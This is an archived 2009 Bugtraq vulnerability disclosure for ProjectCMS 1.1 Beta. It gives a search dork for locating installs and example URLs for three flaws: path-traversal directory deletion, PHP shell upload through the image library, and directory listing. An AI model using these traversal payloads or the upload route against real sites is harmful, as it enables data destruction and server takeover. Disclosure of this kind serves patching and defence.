lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20090504171746.22158.qmail@securityfocus.com>
Date: 4 May 2009 17:17:46 -0000
From: y3nh4ck3r@...il.com
To: bugtraq@...urityfocus.com
Subject: MULTPLE REMOTE VULNERABILITIES --ProjectCMS v-1.1 Beta-->

------------------------------------------------------------
MULTPLE REMOTE VULNERABILITIES --ProjectCMS v-1.1 Beta-->
------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://projectcms.org/
-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.1_BETA.zip
-->DEMO: http://projectcms.org
-->CATEGORY: CMS / Portal
-->DESCRIPTION: ProjectCMS is an open source community project to create
		a simple content management system with an easy to follow install...
-->RELEASED: 2009-05-01

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: "Powered by ProjectCMS"
-->CATEGORY: Remote Dir Remove/ Shell Upload-Image Upload/ Remote Dir Disclosure
-->AFFECT VERSION: <= 1.1 Beta
-->Discovered Bug date: 2009-05-01
-->Reported Bug date: 2009-05-01
-->Fixed bug date: 2009-05-02
-->Info patch(v-1.2 Beta): http://projectcms.org/
-->Info extra(v-1.1 Beta): Fixed Sql injection vuln (Reported on 2009-04-29)
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)


#########################
////////////////////////

REMOTE DIR REMOVE:

////////////////////////
#########################


File Vuln: HOME_PATH/admin_includes/admin_theme_remove.php 
Var Vuln: GET var "file"
Description: You can remove a dir remotely.

http://[HOST]/[HOME_PATH]/admin_includes/admin_theme_remove.php?file=../dir-to-remove/



#####################################
/////////////////////////////////////

SHELL UPLOAD/ARBITRARY IMAGE UPLOAD:

/////////////////////////////////////
#####################################


<<<<---------++++++++++++++ Condition: $allowuploads include php extension (not default) +++++++++++++++++--------->>>>


File Vuln: HOME_PATH/addons/imagelibrary/insert_image.php 
Description: You can upload a PHP shell

http://[HOST]/[HOME_PATH]/addons/imagelibrary/insert_image.php


<<<<---------++++++++++++++ If the above condition is not met +++++++++++++++++--------->>>>

Description: You can upload a arbitrary image

http://[HOST]/[HOME_PATH]/addons/imagelibrary/insert_image.php



##############################
//////////////////////////////

REMOTE DIRECTORY DISCLOSURE:

//////////////////////////////
##############################


File Vuln: HOME_PATH/addons/imagelibrary/select_image.php 
Var Vuln: GET var "dir"
Description: You can show arbitrary directory

http://[HOST]/[HOME_PATH]/addons/imagelibrary/select_image.php?dir=../



#######################################################################
#######################################################################
##*******************************************************************##
##            ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ...         ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ